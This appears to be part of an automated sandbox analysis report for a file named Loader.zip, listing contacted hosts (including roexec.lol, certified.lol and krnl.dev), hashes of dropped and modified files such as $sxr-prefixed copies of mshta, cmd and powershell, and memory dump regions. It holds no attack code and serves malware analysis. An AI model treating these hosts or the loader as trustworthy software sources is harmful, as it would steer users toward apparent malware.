| GB | 92.123.128.181:443 | th.bing.com | tcp |
| GB | 92.123.128.181:443 | th.bing.com | tcp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 204.79.197.200:443 | www2.bing.com | tcp |
| US | 204.79.197.200:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 195.35.38.116:443 | roexec.lol | tcp |
| US | 195.35.38.116:443 | roexec.lol | tcp |
| US | 195.35.38.116:443 | roexec.lol | tcp |
| US | 195.35.38.116:443 | certified.lol | udp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 195.35.38.116:443 | certified.lol | tcp |
| US | 195.35.38.116:443 | certified.lol | tcp |
| US | 195.35.38.116:443 | certified.lol | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| GB | 88.221.134.130:443 | aefd.nelreports.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| GB | 88.221.134.130:443 | aefd.nelreports.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 88.221.134.130:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.134.221.88.in-addr.arpa | udp |
| GB | 92.123.128.177:443 | th.bing.com | tcp |
| US | 104.21.45.127:443 | krnl.dev | tcp |
| US | 104.21.45.127:443 | krnl.dev | tcp |
| US | 192.0.77.48:443 | s.w.org | tcp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | tcp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5c3ea95e17becd26086dd59ba83b8e84 |
| SHA1 | 7943b2a84dcf26240afc77459ffaaf269bfef29f |
| SHA256 | a241c88bb86182b5998d9818e6e054d29b201b53f4f1a6b9b2ee8ba22dd238dc |
| SHA512 | 64c905e923298528783dc64450c96390dc5edbda51f553c04d88ee944b0c660b05392dc0c823d7fb47f604b04061390b285f982dfcc767c8168ccb00d7e94e21 |
\??\pipe\LOCAL\crashpad_5060_GIRDAMHPJMQMHZDS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c65e704fc47bc3d9d2c45a244bb74d76 |
| SHA1 | 3e7917feebea866e0909e089e0b976b4a0947a6e |
| SHA256 | 2e5d6a5eeb72575f974d5fa3cdff7ad4d87a361399ffdd4b03f93cdbdec3a110 |
| SHA512 | 36c3be0e5fbc23c5c0ad2e14cfb1cf7913bea9a5aeb83f9f6fcf5dbc52a94d8ccb370cef723b0cda82b5fba1941b6a9ff57f77ff0076a2c5cf4250711e3dd909 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6a74da537923af1006185e9befa6d9a9 |
| SHA1 | 0469d9f2e691e95d6b228b791b6510e1e8dee86e |
| SHA256 | ccef149182ba2fc272ee91d3d1485ccb2ac9a59918eb9df1de6a0607b231f110 |
| SHA512 | 01349b5c419a338f4f0bf62b3766f6e2c0c599ff78b1aa75b16d7e0fecc31def49c91454ff98cb071b9c795f7fbc71290739bf6388efffa6451e3ee46a43488b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5a6724948a6de41d8ea8e826326e4ae0 |
| SHA1 | 7233ea46fecfa0bcaf3322c0ec49a75afa16aab3 |
| SHA256 | bcebaf7ebbe34b6fe1a63ad6f1b0f41555868d0dfae54275f71bb2c091fcfb03 |
| SHA512 | 47906c91affc1f93a2534fd3cf24c805c13beee921ef15200db894c299619b8fdf691f7866eacb83ff5360b240d7bd4c233d3991b1fb5a3c03c8631482da1c1b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 63ee7d14e2e0d3397262e85785cce4b3 |
| SHA1 | ce78c13951e4518fd3b4b462e24c7d9351d36257 |
| SHA256 | da8cbbb7ba264632297ebeb57f1af32ed6c64f0ceb6bf529e912580eaffd31b2 |
| SHA512 | 0f3145566a802ae6858e5f40dad6b4eaa7d6c2886ef4a403d6c82e4fdd87c1f46fe2380155a0d7786d5bfa9cb797551854abdbc1c213d07f33891228845227d7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 908e8d70878588e4657bfe595e9ae276 |
| SHA1 | e68018d68bc65e09fb3323d058a572a9098e30e3 |
| SHA256 | 6bb3c7a875d17ba91140e2e4cbf1510286f9db193fd83cdaaf19a3c7d78c0eb4 |
| SHA512 | f69cf64d11fba4e771dea198884589b4763f414de67aab514661c23281c802e1a2cfc3f0a61ffa7a555ea20b6cd50093f7ad5ea3c4715295e3dae570959e21f7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | 95945f7fa812eeeaf50e51f8b4a517b2 |
| SHA1 | abb14c3216bbef89710428e8892f13a73db32dcf |
| SHA256 | 632ccdfc59c320e77f7aa8af05cd31edb22949a5d0eec4f58023546afd62dc5b |
| SHA512 | b0a173c89d9b01cb236329637c5dd4cb8b92e7999c802c54d6fa10ea71770fe0cd741ccaedb73e0475012f080f8d7798faff4fb80d325c5e85cd9c0802122ee9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | a4435041d32ec4fd5a07380234d5acdf |
| SHA1 | d2dde195cac4e554fc2e71139c4acf94376af20a |
| SHA256 | 103b6be633d6fd412a2c1d9bb8bdd491609b0976977cff3dd43e6d29e4ee9dd0 |
| SHA512 | fcabca3e1c67b9e55152a30c87acc64d31fc86ff9b1763a3ddfc67e4c3b1ac3c2e50b75e989efbc44f1e8a31a6dd7a5b9aa2468ef32d16634e4ee9eb08057fab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | f55308b11853ed71d1b58091b1e2360c |
| SHA1 | 89ffd41c65e5d56a1f7b12e0a3f37112cd02d033 |
| SHA256 | be6ab8bfb70f8e9540b53f279ca48c0407e2a13b17e050203a8575913fedbb88 |
| SHA512 | 96a8f5383ef4fc0f19be3bbf349be8275f7a65ce1e31476803eb6722428c49c43a8b86112bd3f091272510163b7b398bdc84a7db8bf7a3243810c181911e524f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | e77aed570206af2675db030ccef9daf6 |
| SHA1 | 251d11d55c69563e3d7325ac671cf86e90a75a79 |
| SHA256 | 14296e04a0d954266f07abae864d11172951e2a1e1694f3be0079520d0420eaf |
| SHA512 | 707f860c7e05ef50ca43683f0eda40944eb9cb8d531dedc4de7bef794a3ab9171740e65e4c74f22c03e21accd932cb3be223722da79bdcf2367a354189817044 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e0dfd42fd1b19b370c62589051c2425b |
| SHA1 | 993064782b0b0b4ae3da68efbe60d8f632bab80d |
| SHA256 | dc15016f85221aefb20e813b688c8038296def017a13426c938b557a7c89eb2e |
| SHA512 | 38c08d95e98dc8625e352cd33818d320d5dc1867b54baf601add2d2a8286cdcf02dd2ebcdc13934a1e6dacc4aa574702acf28fdf72266fcb0792c33ad758677d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe581e9f.TMP
| MD5 | 6ac92cf57faf0e36e5e34e82ae7ebca7 |
| SHA1 | dfa909b61c7fd7d5eba8b3974b21d988c34be058 |
| SHA256 | 0b2c41de8c96d01a8668d42fc184ecd117f2ef2fbd93168ccc1d30bf0765c982 |
| SHA512 | d9352c61917e70c2261834b5cc287d27264d72d66f328a4f8fa72b1cfbc27ffcb54ea1698a13e3259099139b9302fcca49dd230cef45d7b1ac9ca3e1318f4929 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f0e008da3f7b4e9367c2b9e33480cdba |
| SHA1 | 1b83d6d3485d026d627aa11e45db3a11aaaeec24 |
| SHA256 | cf8b7c242ce08c5ab3b973bf41ed13820f4b2b7d9b05d95277d6bd859e632921 |
| SHA512 | 28ff3bff4e3f4c7d7c47f9cb5e44f337699478b37bbff4e63427b891e049f7fb6b8251e3d6a53b01b526df0c372b30284844d6158553d843f5231431858f0bbc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001
| MD5 | 7d5eacbf0dd996db1cb13d8af38ff96b |
| SHA1 | 87585612306c60dd7860c176fcbe346649eefe76 |
| SHA256 | b93db7697473491ece00785ec705b92737f0bc83de6978bfd6a0ab970cd65c7b |
| SHA512 | 3e2871f240d496125d9b6c764d33c15732b8857d7a311d00098adb791659596430b7c00942a169390dbf82c9c71121be463fa110173c51c45319466aea096f96 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7f7355e5d0d28c47312df75953b2376a |
| SHA1 | 4bf95bef6559a0f62b62d24090d8862bc746f635 |
| SHA256 | 017d065d92215e9b551affcb4a64f44b15938139552f2bc033777c8c7bd16cca |
| SHA512 | ce55e1ff60c1e78d97091e4ee7386d84841b0535efcf28e4d6f3c7268d097321cd66c6a1e3876af892e2e4bbad1d309a7e2553beecacadb2e30628256b1d0c18 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3ad19751f76c1f18b74c2356f76e1f76 |
| SHA1 | 31edc7f1d849b897ba7bed296ee67d1822ea0c11 |
| SHA256 | 7bd869f630812aef6bb404c35b780d851151d296fbdd1ba7dc7d9fb18d03b1f6 |
| SHA512 | af5d3f746b42fc98c3461fde8fee61b7009b20beb106be938e3815d990874607dee480db6c9072a1acdc12b9e714aa2d369c0575fe8cdd977d44901a98693399 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 1b299897a0e734d84be6f02f524f0bfe |
| SHA1 | ef16a90efa6f8435b536448ff8e000db0f941f90 |
| SHA256 | d1c3aab672be8c3accffae101c1a397de7b2b00b931a44bcaaf6e3708be16af8 |
| SHA512 | a7eadc7f8d0c2b1b60b01890f1948833adbe3680cf0a52ec323271cf917d602f78e36ca35eb09bff8d9db4c92639fd8dc453acac01bccbb3bac4ce43767e53ee |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 917ed79810830d45a4acd489fa803242 |
| SHA1 | db5b90d2d9a10182da1ef74e189786ddb95a4075 |
| SHA256 | 22144f9f974da1d23c366a6d6ff28b2ce17d3691b081402a997c35a763004621 |
| SHA512 | 2f2fb40688d28c819dd4744c107f92ecf04bf0a83d13bdd583a2b8b2eef71a1d3b6f0720b2fbdf194565e7ad8fdfa7371b3196afe6e3e913cace89c143fb76af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4816fd127657ba5c363502710f55275a |
| SHA1 | 9caa15812d239d8cc3e0690e00a5c4425773a830 |
| SHA256 | ffe10dd24cfeda3e6b9500cc2fd9d7dbefe2fb27254b73a983c02f82778695eb |
| SHA512 | b421d26e4a0f8173ca4c2dc21fc5cf8f42e3783b4d3993a24fd21b9d69beb026fc536edf8bdc88bff556054ff07ce8ad077cb1141fd9b69eb5d8660c3f1c86ac |
C:\Users\Admin\Downloads\Loader.zip:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\Downloads\Loader.zip
| MD5 | 8634d93ae4d9e6a763b3fe9d140d820e |
| SHA1 | 1c95c71759a567de680b1297c8246d9bfdd2b5eb |
| SHA256 | b71bf7eef397522a3ca415fd83c0c393e328eaf5c61edf622289cfc5c2b4f6dd |
| SHA512 | 7466e9aba04c00150b0c3fef0a4523b31b744f844eaef11b153d970324cd6c23be114d4a553bf95ba035cfef74fc2319e73f5fda433a7cc178b7cc223992b5f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bcf4cfae0d56227e93e51f12f7448296 |
| SHA1 | 49759bd3bdffc3cf9eb5a4675f3c4d82a1b0b5ce |
| SHA256 | ee379c4144f792ceb30f2361e8d29bb4f9ad454dab96fdb4c0c75bbce65ef7a9 |
| SHA512 | a0acc2981907b20f6495af7f7058e1127ef8a6c063915cdd727bde7bbe85dedccaa90cd0fd2d45b4b9ada674d0d3a4da78e091e704930b0271888e6615c6c76f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | bacaec4240f226b9c4b6571caa5b55b7 |
| SHA1 | 1aae1024e393c43d8a8eaaaf90dab6a91320bb37 |
| SHA256 | b7009cd4f8215c00df2fdeb4c19f47744ac85e05299868bdd2b8a127f5630050 |
| SHA512 | 12da3da8061f9fd1e163ef4f893e64909d33bed7ba8ad237f05725a57f6c1e42948344742997497bd6b20148cfc39439dd1e29a9f2122c67016845890af6a1f8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d07ba308715e5189eb664e2fe9771f9d |
| SHA1 | 738685032a1df1a8bdcfbf6df5c9fe2a8b049ea3 |
| SHA256 | 4d6480b5aeb3ae06abbe30a6e969fadf45b267159263cda59ac9a10694852e4c |
| SHA512 | b1e36b78f674cdd17dcc2cdbf2d33db50075bde8216e62a80ae54986a8019a66c16744ccfc0f835e8e53180ac023c7f5dd5ee4d667d97f20879b8262f9088d93 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dfohk201.ujy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1472-513-0x00000266FF170000-0x00000266FF192000-memory.dmp
memory/1472-514-0x00007FF99A010000-0x00007FF99AAD2000-memory.dmp
memory/1472-515-0x00000266FEF10000-0x00000266FEF20000-memory.dmp
memory/1472-516-0x00000266FEF10000-0x00000266FEF20000-memory.dmp
memory/1472-517-0x00000266FF5C0000-0x00000266FF606000-memory.dmp
memory/1472-522-0x0000026688000000-0x0000026688AAC000-memory.dmp
memory/1472-526-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-527-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-528-0x0000026688AD0000-0x00000266895BC000-memory.dmp
memory/1472-529-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-531-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-530-0x00007FF9BC780000-0x00007FF9BC83D000-memory.dmp
memory/1472-532-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-533-0x00000266FEF10000-0x00000266FEF20000-memory.dmp
memory/1472-534-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-535-0x00007FF99A010000-0x00007FF99AAD2000-memory.dmp
memory/1472-536-0x00000266FEF10000-0x00000266FEF20000-memory.dmp
memory/1472-537-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-538-0x00000266899D0000-0x0000026689ACC000-memory.dmp
memory/1472-539-0x0000026689AD0000-0x0000026689AF2000-memory.dmp
memory/1472-540-0x0000026689B10000-0x0000026689B16000-memory.dmp
memory/1472-541-0x0000026689B20000-0x0000026689B7E000-memory.dmp
memory/1472-542-0x0000026689B80000-0x0000026689BD8000-memory.dmp
memory/1472-543-0x0000026689AF0000-0x0000026689AF6000-memory.dmp
memory/1472-544-0x00000266E6D20000-0x00000266E6D28000-memory.dmp
memory/1472-545-0x0000026689B00000-0x0000026689B06000-memory.dmp
memory/1472-546-0x0000026689BE0000-0x0000026689C1E000-memory.dmp
memory/1472-547-0x0000026689C20000-0x000002668A84C000-memory.dmp
memory/1472-557-0x000002668A850000-0x000002668A902000-memory.dmp
memory/1472-558-0x000002668A900000-0x000002668A936000-memory.dmp
memory/1472-559-0x000002668A940000-0x000002668A998000-memory.dmp
memory/1472-560-0x000002668A9A0000-0x000002668A9CE000-memory.dmp
memory/1472-561-0x00007FF6B6C20000-0x00007FF6B6C8E000-memory.dmp
memory/1472-563-0x00000266FEF10000-0x00000266FEF20000-memory.dmp
memory/1472-562-0x00000266FF0E0000-0x00000266FF12B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b
| MD5 | d6b36c7d4b06f140f860ddc91a4c659c |
| SHA1 | ccf16571637b8d3e4c9423688c5bd06167bfb9e9 |
| SHA256 | 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92 |
| SHA512 | 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d
| MD5 | 81b5bf3e7f17f01a1700eef349957808 |
| SHA1 | b9cd99e57d95da98a135b89458fbb173624d86af |
| SHA256 | dd8b51eefbecd4f6aa6d47bb282c01402fe6cbc8708db5406d8c0a7de3084052 |
| SHA512 | ce9a3dce9d883ab231b2e5643fa11ced7318c0a2e84b60711212d2d156e4e8ef27e4304ec20aa90584cc8a10949e031fe116059b0e4b48d9b69e956c059c101b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
| MD5 | a127a49f49671771565e01d883a5e4fa |
| SHA1 | 09ec098e238b34c09406628c6bee1b81472fc003 |
| SHA256 | 3f208f049ffaf4a7ed808bf0ff759ce7986c177f476b380d0076fd1f5482fca6 |
| SHA512 | 61b54222e54e7ab8743a2d6ca3c36768a7b2cf22d5689a3309dee9974b1f804533720ea9de2d3beab44853d565a94f1bc0e60b9382997abcf03945219f98d734 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e
| MD5 | 76a3f1e9a452564e0f8dce6c0ee111e8 |
| SHA1 | 11c3d925cbc1a52d53584fd8606f8f713aa59114 |
| SHA256 | 381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c |
| SHA512 | a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f
| MD5 | 710d7637cc7e21b62fd3efe6aba1fd27 |
| SHA1 | 8645d6b137064c7b38e10c736724e17787db6cf3 |
| SHA256 | c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b |
| SHA512 | 19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010
| MD5 | 74e33b4b54f4d1f3da06ab47c5936a13 |
| SHA1 | 6e5976d593b6ee3dca3c4dbbb90071b76e1cd85c |
| SHA256 | 535fc48679c38decd459ad656bdd6914e539754265244d0cc7b1da6bddf3e287 |
| SHA512 | 79218e8ee50484af968480ff9b211815c97c3f3035414e685aa5d15d9b4152682d87b66202339f212bf3b463a074bf7a4431107b50303f28e2eb4b17843991c2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011
| MD5 | 24a16440d5b663d0d87263e812e3fd90 |
| SHA1 | 0ffec5a540218892b440703dfbf04bf1252def68 |
| SHA256 | c3af8b6de514fe12fef4987e8a1a9c6294ea0ebf46d0537bf02d18595abbe799 |
| SHA512 | 9845ca0adcbdf6e77a021073f5f01c6b0ecc0593d2c7e13d58b7717368d466d69f74c51934c77f21aaaf0704815fdefdf285748aa3e17441b700ba092a6df9cc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ffbc3e6f6d3f7da3db00a1af12ff952c |
| SHA1 | 82a9e508ad28eaa8f0cf9c93e952cb1afbeb2798 |
| SHA256 | de023022027667257ffb9e2c80ebe514c5777a473816e7d1a96a96af96bfb341 |
| SHA512 | 3789d641dbd25a1d00f06066dcdf8770390e22dd39de48cc845bfce7838b77c3a567c1a4de9154a9904d7d28d13ea551b8f8682a090975ea909d64ead51bad03 |
memory/1472-767-0x000002668A9D0000-0x000002668A9D8000-memory.dmp
memory/1472-768-0x0000000180000000-0x0000000180007000-memory.dmp
memory/1472-826-0x00007FF9996A8000-0x00007FF9996A9000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 356e04e106f6987a19938df67dea0b76 |
| SHA1 | f2fd7cde5f97427e497dfb07b7f682149dc896fb |
| SHA256 | 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e |
| SHA512 | df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd |
C:\Windows\$sxr-cmd.exe
| MD5 | c5db7b712f280c3ae4f731ad7d5ea171 |
| SHA1 | e8717ff0d40e01fd3b06de2aa5a401bed1c907cc |
| SHA256 | f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba |
| SHA512 | bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89 |
C:\Windows\$sxr-powershell.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
| SHA512 | e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d |
memory/1472-904-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-905-0x00007FF99A010000-0x00007FF99AAD2000-memory.dmp
memory/1068-911-0x000002194F290000-0x000002194F2A0000-memory.dmp
memory/1068-912-0x000002194F290000-0x000002194F2A0000-memory.dmp
memory/1472-916-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | e566632d8956997225be604d026c9b39 |
| SHA1 | 94a9aade75fffc63ed71404b630eca41d3ce130e |
| SHA256 | b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0 |
| SHA512 | f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd |
memory/1068-918-0x000002194F290000-0x000002194F2A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 38569efaadca67de65a2338e1f1fca92 |
| SHA1 | 43dcbe781e171741b03f829db67d54ff91593097 |
| SHA256 | a6ae24ca91ff79da200eb7a91a09d47e69a8535c9dfc801e82c6c2b9f38078af |
| SHA512 | 63684a56497bb9a4425d5871a4b2c6e30fc6f5ff1ba908c4dfcb93d8939325f190053e9f4dde39ff3bce21f4407b0b4f11d038fe3e4934b52c543f3f9effdb66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b37b805cd16d6f7322bacc0c4ce535fe |
| SHA1 | cd9de109cb6a0f3f8531e060898c0016f90ebf19 |
| SHA256 | 8fb286ca539fb5464123553f7d86898849ae3a3188147af88c685f6560fcdd82 |
| SHA512 | 99ec39658366051d501c68825d8070bdbd09a2aef937ff2d752512fe9605cee10353b517cabd748e0ac8227e727e70e027debd770c7e855d5eb578413c9fa009 |
memory/1068-939-0x000002196F800000-0x000002196FEA6000-memory.dmp
memory/1472-940-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-941-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-942-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-943-0x000002196FEB0000-0x0000021970598000-memory.dmp
memory/1068-944-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-945-0x00007FF9BC780000-0x00007FF9BC83D000-memory.dmp
memory/1068-946-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-947-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-948-0x0000021936E40000-0x0000021936E62000-memory.dmp
memory/1068-949-0x0000021936FA0000-0x0000021936FA6000-memory.dmp
memory/1068-950-0x0000021936FC0000-0x0000021936FC6000-memory.dmp
memory/1068-951-0x0000021970A50000-0x0000021970F9E000-memory.dmp
memory/1068-952-0x0000021970FA0000-0x000002197174E000-memory.dmp
memory/1068-953-0x0000021971750000-0x0000021971ADC000-memory.dmp
memory/1068-954-0x0000021971AE0000-0x0000021971B92000-memory.dmp
memory/1472-956-0x00007FF99A010000-0x00007FF99AAD2000-memory.dmp
memory/1472-957-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1068-958-0x0000021971F90000-0x0000021971FFA000-memory.dmp
memory/1068-959-0x00000219720B0000-0x00000219720F2000-memory.dmp
memory/1068-963-0x0000000180000000-0x0000000180007000-memory.dmp
memory/688-967-0x000001EEB1030000-0x000001EEB1059000-memory.dmp
memory/688-966-0x000001EEB1000000-0x000001EEB1023000-memory.dmp
memory/688-968-0x000001EEB1030000-0x000001EEB1059000-memory.dmp
memory/688-976-0x00007FF97E170000-0x00007FF97E180000-memory.dmp
memory/688-977-0x000001EEB1030000-0x000001EEB1059000-memory.dmp
memory/688-978-0x000001EEB1030000-0x000001EEB1059000-memory.dmp
memory/688-979-0x00007FF9BE184000-0x00007FF9BE185000-memory.dmp
memory/992-983-0x0000024959FB0000-0x0000024959FD9000-memory.dmp
memory/1068-986-0x00007FF99A010000-0x00007FF99AAD2000-memory.dmp
memory/1068-988-0x000002194F290000-0x000002194F2A0000-memory.dmp
memory/1068-989-0x000002194F290000-0x000002194F2A0000-memory.dmp
memory/992-995-0x0000024959FB0000-0x0000024959FD9000-memory.dmp
memory/992-996-0x0000024959FB0000-0x0000024959FD9000-memory.dmp
memory/992-994-0x00007FF97E170000-0x00007FF97E180000-memory.dmp
memory/1068-998-0x000002194F290000-0x000002194F2A0000-memory.dmp
memory/772-1001-0x00000249F35D0000-0x00000249F35F9000-memory.dmp
memory/1040-1015-0x000001E1FE570000-0x000001E1FE599000-memory.dmp
memory/772-1011-0x00000249F35D0000-0x00000249F35F9000-memory.dmp
memory/1068-1020-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/772-1010-0x00000249F35D0000-0x00000249F35F9000-memory.dmp
memory/772-1009-0x00007FF97E170000-0x00007FF97E180000-memory.dmp
memory/1068-1028-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp